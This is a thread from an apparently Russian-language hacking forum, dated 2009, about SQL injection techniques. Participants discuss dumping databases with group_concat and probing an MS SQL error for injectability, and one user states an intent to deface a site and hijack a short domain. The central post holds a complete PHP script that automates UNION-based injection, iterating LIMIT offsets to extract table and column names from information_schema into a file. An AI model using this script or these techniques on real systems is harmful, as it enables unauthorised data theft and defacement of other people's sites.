 |
|
05.04.2009, 19:43
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
2 Gorev
А какже group_concat()
я только этим и пользуюсь
|
|
|
05.04.2009, 19:45
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами:
9076508
Репутация:
169
|
|
group_concat выводит, правда не все, а насколько хватит места в поле
|
|
|
|
05.04.2009, 19:48
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Сообщение от Saiga
2 Gorev
А какже group_concat()
я только этим и пользуюсь
group_concat() НЕ вывод всё....он огранич значением в group_concat_max_len.Так же он вроде бы не поддерживает лимит.
|
|
|
|
05.04.2009, 20:20
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Если после ввода такой конструкции site.ru/index.asp?id=2'
Вылезла ошибка :
PHP код:
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark before the character string ''.
Возможно ли сдесь провести SQL-inj, просто я в MS SQL не как вообще... |
|
|
|
05.04.2009, 20:24
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами:
9076508
Репутация:
169
|
|
возможно  |
|
|
|
05.04.2009, 21:27
|
|
Познающий
Регистрация: 27.09.2008
Сообщений: 44
С нами:
9274683
Репутация:
32
|
|
тогда path = http://abc.ru/a.htm
осталось найти трехбуквенник ру
я до этого тоже додумался, и спрашивал, потому что нету желания платить за 3-х значный домен, который мне больше не будет нужен. И сайт сам по себе того не стоит, мне чистый дефейс нужно сделать, пробил все сайты на хосте, ни одной потенциальной баги, все статичные htm мелких предприятий...
з.ы.
но тут появилась идея попробовать взломать какой-нибудь 2-х или 3-х значный домен =)
|
|
|
|
05.04.2009, 22:34
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Сообщение от .:[melkiy]:.
Можно ли как-то вывести все таблицы из БД (sql inj) не лимитом?? Т.е не менять limit+1,1, limit+2,1 и т.д, а одним запросом вывести всю БД!!!
Сам вчера распрашивал знакомых по дному вопросу...
Кароче ответ таков:
Мускул здесь нипричём, дело в скрипте, если скрипт не поддержует многостроковый вывод, то никак, но зато для автоматизации перебора через лимит написано множество скриптов. Вот один из них:
PHP код:
<?
#Скрипт для перебора значений limit в sql injection
set_time_limit(0);
error_reporting(0);
#В примере: 0x7C - соответствует символу "|", вместе с символом разделителем 0x3a получается запрос, ограниченный "|:" и ":|"
$n="|:"; #начало искомой
$n2=":|"; #конец искомой
$j=0; #парсить с
$lim=0; #до (0 - если до конца)
function get_page($url){ #получение страницы
$link=parse_url($url);
$host = $link['host'];
$src = $link['path'];
$src .= ($link['query'] > "")?"?".$link['query']:"";
$sock = fsockopen ($host, 80);
fputs ($sock, "GET /$sr<-b>c HTTP/1.0\r\nHost: $host\r\n\r\n");
$cont = "";
while (!feof ($sock)) { $cont .= fgets ($sock); }
fclose ($sock);
return $cont;
}
for($i=$j;($lim != 0) ? $i<$lim : 1 != 0;$i++){ #получение данных
$url="http://www.site.com/products.php?category_id=-1+union+select+1,2,concat_ws(0x3a,0x7c,table_name,column_name,0x7c),4+from+information_schema.columns+limit+$i,1/*"; #ссылка
$page=get_page($url);
$page=strip_tags($page);
$pos=stripos($page,$n);
$pos2=stripos($page,$n2,($pos+1));
if($pos == ""){echo "\n Current value - $i"; break;}
$page=substr($page,($pos+strlen($n)),($pos2-$pos-strlen($n2)));
$page .="\n";
echo $page;
$r=fopen('out.txt','a+'); #сохранение в файл
fputs($r,$page);
fclose($r);
}
?>
// Вроде бы правила ответа на вопрос не нарушел...
|
|
|
|
05.04.2009, 22:53
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
group_concat
Но тоже частями, но побольше, побольше
ЗЫЖ Для тех, кто думает, что через груп-конкат нельзя вывести всё абсолютно, вспомните про знаки ">" и "<" и подзапросы, и не парьте мне мозг своими оценками
Последний раз редактировалось Pashkela; 05.04.2009 в 23:08..
|
|
|
|
05.04.2009, 23:26
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Сообщение от Byrger
Если после ввода такой конструкции site.ru/index.asp?id=2'
Вылезла ошибка :
PHP код:
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark before the character string ''.
Возможно ли сдесь провести SQL-inj, просто я в MS SQL не как вообще...https://forum.antichat.ru/thread30501.html
|
|
|
|
05.04.2009, 23:32
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
dllerk, ошибка вызвана каким то твоим действием, или просто висела на странице??
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
